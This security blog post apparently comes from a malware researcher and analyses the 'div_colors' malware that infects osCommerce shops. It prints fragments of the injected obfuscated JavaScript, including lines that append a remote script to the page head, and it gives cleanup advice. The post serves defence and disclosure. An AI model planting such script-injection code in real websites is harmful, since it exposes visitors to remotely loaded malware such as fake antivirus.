The “div_colors” Malware Update

We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and added the following obfuscated code to the pages:

if (typeof(redef_colors)==”undefined”) {
var div_colors = new Array("#4b8272′, "#81787f’, ‘#832f83′, ‘#887f74′, ‘#4c3183′, ‘#748783′, ‘#3e7970′, ‘#857082′, ‘#728178′, ‘#7f8331′, ‘#2f8281′, ‘#724c31′, ‘#778383′, ‘#7f493e’, ‘#3e7a84′, ‘#82837e’, ‘#40403d’, ‘#727e7c’, ‘#3e7982′, ‘#3e7980′, ‘#847481′, ‘#883d7c’, ‘#787d3d’, ‘#7f777f’, "#314d00′);..

var redef_colors = 1;
var colors_picked = 0;

function div_pick_colors(t,styled) {

As you can see, it looks like a valid JavaScript and that’s what is confusing a lot of people. In fact, what it does is load a new (and malicious) JavaScript element from an external web site, as you can see here:

var new_cstyle=document.createElement("script”);
document.getElementsByTagName("head”)[0]. appendChild(new_cstyle);

Where is it lloading the malicious code from?

Right now, it is loading from, but a few hours ago, it was using a different domain name, and it changes every few hours! The code is also mutating, and every infected site has a backdoor to load the new variation every once in a while.

This is a list of the some of the domains used so far:

As you can see by the common domain names, it is trying to push the infamous fake AV.

Here is the frame created by the first intermediary, which is also changing:

<frame src ="" ..
<frame src="

It’s a very complex malware, and every osCommerce user needs to make sure their site is secure. The file_manager.php file needs to be removed, and the admin directory renamed and protected. We also recommend our security scanner to verify if a site is infected. If it is, we can take care of it for you.

Scan your website for free:
About David Dede

David Dede is a Security Researcher in the SucuriLabs group. He spends most of his time dissecting vulnerabilities and security issues. You won't find him on Twitter because he is paranoid about privacy.